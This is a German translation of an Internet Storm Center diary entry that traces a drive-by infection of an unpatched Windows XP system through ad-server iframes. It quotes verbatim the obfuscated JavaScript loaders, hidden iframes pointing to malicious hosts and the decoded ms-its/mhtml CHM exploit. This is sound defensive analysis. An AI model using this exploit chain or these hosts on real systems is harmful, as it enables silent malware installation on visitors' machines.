Schädlingen auf der Spur
Wer sich mit einem ungepatchten Windows-System ins Web wagt, hat ziemlich schnell Ärger am Hals. Tom Liston analysiert im Selbstversuch, was dabei alles an Unrat auf seinem System landet.
Dies ist ein Tagebucheintrag des Diensthabenden im Internet Storm Center. heise Security veröffentlicht die deutsche Übersetzung mit freundlicher Genehmigung des ISC und des Autors Tom Liston. Das Original finden Sie hier.
Nachdem ich einige Adware/Spyware/Malware-Programme untersucht hatte, entschloss ich mich zu einem Experiment. Ich wollte wirklich sehen wie schnell ein ungepatchtes System kompromittiert wird - und wie das aus der Sicht eines "Otto Normal"-Anwenders aussieht. Ich setzte dazu ein VMWare-Image einer neuen Windows-XP-Home-Installation auf und machte mich auf ins Internet. Auf dieser aufschlussreichen Reise begegnete ich einer Reihe von Gefahren, die auf den unachtsamen Wanderer lauern und ich lernte einiges über die Spy-/Adware-Industrie.
Dies ist der erste Teil meiner Analyse dessen, was mir alles zustieß, als ich die im Internet notwendigen Schutzmaßnahmen "vergaß". Der zweite Teil untersucht das volle Ausmaß des Schadens, der dem armen "Otto Normalo" zugefügt wurde. Als kleiner Vorgeschmack kann ich schon hier sagen: Wenn es nach der Adware/Spyware-Industrie geht, haben Sie zwar den PC gekauft - aber DIE bestimmen darüber. Die unverschämte Dreistigkeit ihres Vorgehens wird Sie überraschen und ich hoffe, diese Lektüre bewegt den ein oder anderen Leser dazu, aufzuwachen und etwas zu unternehmen.
Offensichtlich hängt das, was in diesem Experiment passiert, davon ab, wohin ich im Netz gehe. Um fair zu sein: Die im Folgenden erwähnten Sites sind nicht wirklich was besonderes -- im Gegenteil: Sie sind nicht schlimmer oder besser als viele andere Ad-/Spyware-Seiten. Meine Auswahl orientierte sich an dem Vorfall, den ich ohnehin gerade untersucht hatte.
Für meinen "Otto Normalo" baute ich so gut wie möglich das gerade untersuchte System nach. Darauf lief ein Internet Explorer 6.0 mit Google Toolbar und aktviertem Popup-Blocker. Behalten Sie diese Konfiguration im Hinterkopf, wenn ich "der Spur der Schädlinge" folge.
Noch etwas, sas Sie nicht vergessen sollten: Ich werde keine der erwähnten URLs in dieser Geschichte als aktive Links setzen. Das ist Absicht. FOLGEN SIE KEINEN URLs IN DIESEM ARTIKEL, BESONDERS DANN NICHT, WENN IHR SYSTEM NICHT VOLLSTÄNDIG GEPACHT IST. SIE SIND GEMEINT. ECHT.
[Anm. des Übersetzers: Zum Zeitpunkt der Veröffentlichung unserer Übersetzung existierten die angebenen URLs immer noch. Die Warnung des Autors ist also durchaus ernst zu nehmen.]
Nachdem ich die Google Toolbar installiert hatte, machte ich dasselbe, wie mein "Otto Normalo", als er sich sein System infiziert hatte: Ich habe gegoogelt. Jemand hatte ihm von "Yahoo Games" erzählt und er wollte sich das mal ansehen. Ich gab bei Google "Yahoo Games" ein und übersprang (warum auch immer... schließlich machte das auch mein "Otto Normalo") ein paar Links, die offensichtlich zu Yahoo! führten. Statt dessen klickte ich auf "www.yahoogamez.com" (ACHTUNG: Wenn ihr System nicht voll gepacht ist, GEHEN SIE DA NICHT HIN).
yahoogamez.com ist eine Web-Seite mit Links zu vielen verschiedenen Online-Spielen. Ich weiß zwar nicht, ob die Spiele was taugen, aber die Werbung dort ist ziemlich interessant. Wie bei vielen Web-Sites, die Online-Spiele anbieten, beruht das Geschäftsmodell darauf, Leute auf die Seite zu leiten und über die dort eingebauten Anzeigen Geld zu verdienen. Dabei hängt der Umsatz davon ab, wie oft eine Anzeige erscheint und ganz besonders davon, wie oft darauf geklickt wird. In der Regel hat der Seitenbetreiber einen Vertrag mit einem Zwischenhändler, der an Werbekunden "Platzierungen" auf den Seiten verkauft, mit deren Betreibern er Verträge hat. Die meisten dieser Online-Anzeigenfirmen stellen dann Server bereit, die dann den Code und die Anzeigenmotive an die teilnehmenden Web-Sites ausliefern.
Auf der Site von yahoogamez.com werden an zwei Stellen Anzeigen eingeblendet, die "aim4media.com" bereitstellt. Wenn man die yahoogamez-Seite aufruft, gibt es einen Sturm von HTTP-Anfragen, darunter die folgende:
[20/Jul/2004:13:50:11 -0500] "GET_hxxp://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"
Sie liefert den folgenden HTML-Code zurück:
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0'
style='background-color:transparent'>
<iframe src="hxxp://205.236.189.58/mynet/mynet-MML.html"
width=468 height=60 hspace=0 vspace=0 frameborder=0
marginheight=0 marginwidth=0 scrolling=no>
<a href="hxxp://205.236.189.58/mynet/mynet-MML.html"
target="_blank">
<img width=468 height=60
src="hxxp://205.236.189.58/mynet/mynet-MML.html"border=0>
</a>
</iframe><div id="beacon_459" style="
position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='hxxp://adserver.aim4media.com/adlog.php?bannerid=459&
amp;clientid=431&zoneid=450&source=&
block=86400&capping=3&cb=7da741942b0623acd85070683ffa3ad8'
width='0' height='0' alt='' style='width: 0px; height: 0px;'>
</div>
</body>
</html>
Der iFrame erzeugt wieder einen HTTP-GET-Aufruf:
[20/Jul/2004:13:50:14 -0500] "GET_hxxp://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"
der den folgenden HTML-Code herunterlädt:
<a href="hxxp://www.lovemynet.com/?frombanner2" target="_blank"><img src="hxxp://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0></a><!-- HP2 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
Das sieht ganz so aus, als wollte jemand etwas verstecken. Dekodiert ergibt es:
<iframe src="hxxp://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>
[20/Jul/2004:13:50:17 -0500] "GET_hxxp://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"
was dann das hier liefert:
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>
Dekodiert ergibt das:
<textarea id="code" style="display:none;">
<object
data="ms - its:m html:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>
[Anm. des Übersetzers: Das ist offensichtlich der Exploit, der im Browsercheck als "Installieren und Ausführen von Dateien via mhtml-Redirect" demonstriert wird. Das "m" aus dem URI "ms-its:" kodiert der Autor dieses Exploits über die HTML-Darstellung m -- wahrscheinlich, um die Erkennung durch Filter und Antiviren-Software weiter zu erschweren.]
